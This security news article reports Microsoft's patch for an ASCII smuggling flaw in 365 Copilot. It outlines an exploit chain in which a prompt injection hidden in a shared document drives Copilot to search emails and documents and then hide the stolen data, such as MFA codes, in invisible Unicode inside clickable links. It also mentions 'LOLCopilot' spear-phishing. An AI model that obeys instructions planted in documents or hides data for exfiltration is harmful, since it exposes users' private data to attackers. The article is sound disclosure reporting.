1 min read

Microsoft Patches ASCII Smuggling Vulnerability in Recent Security Update

Vlad CONSTANTINESCU

August 27, 2024

Promo Protect all your devices, without slowing them down.
Free 30-day trial
Microsoft Patches ASCII Smuggling Vulnerability in Recent Security Update

Microsoft has patched a critical vulnerability in its 365 Copilot service that exposed user data to severe risks through an advanced exploitation technique known as ASCII smuggling, the company announced.

Under the right conditions, perpetrators could exploit this vulnerability to steal multi-factor authentication (MFA) codes and other sensitive information from users.

ASCII Smuggling Puts Sensitive Data at Risk

Security researcher Johann Rehberger explained the mechanics behind ASCII smuggling: “ASCII Smuggling is a novel technique that uses special Unicode characters that mirror ASCII but are actually not visible in the user interface. This means that an attacker can have the LLM render, to the user, invisible data, and embed them within clickable hyperlinks. This technique basically stages the data for exfiltration!"

The flaw hinged on several interlinked attack methods that form a potential exploit chain:

  • Prompt Injection: Initiated through malicious content hidden within a document shared via chat
  • Payload Execution: Using the injected prompt to compel Copilot to search through additional emails and documents
  • Data Exfiltration: Using ASCII smuggling to lure the user into clicking a hyperlink that exfiltrates sensitive data to an attacker-controlled server

Patched Before it Could be Exploited

After the vulnerability’s disclosure in January, Microsoft quickly released a patch to fix the flaws before they could be exploited.

Security researchers demonstrated proof-of-concept attacks that could manipulate Copilot responses, extract private data and bypass security measures.

‘LOLCopilot’ Could Turn AI Systems into Spear-Phishing Tools

One particularly alarming exploit, referred to as “LOLCopilot,” could let threat actors weaponize an AI system, turning it into a spear-phishing tool that could send phishing messages that mimic the communication style of the compromised account.

Additionally, Microsoft acknowledged the risks posed by publicly accessible Copilot bots created with Microsoft Copilot Studio, especially those without proper authentication measures.

Threat actors could exploit these bots to siphon off sensitive information if they possess prior knowledge of the Copilot's name or URL.

tags


Author


Vlad CONSTANTINESCU

Vlad's love for technology and writing created rich soil for his interest in cybersecurity to sprout into a full-on passion. Before becoming a Security Analyst, he covered tech and security topics.

View all posts

You might also like

Bookmarks


loader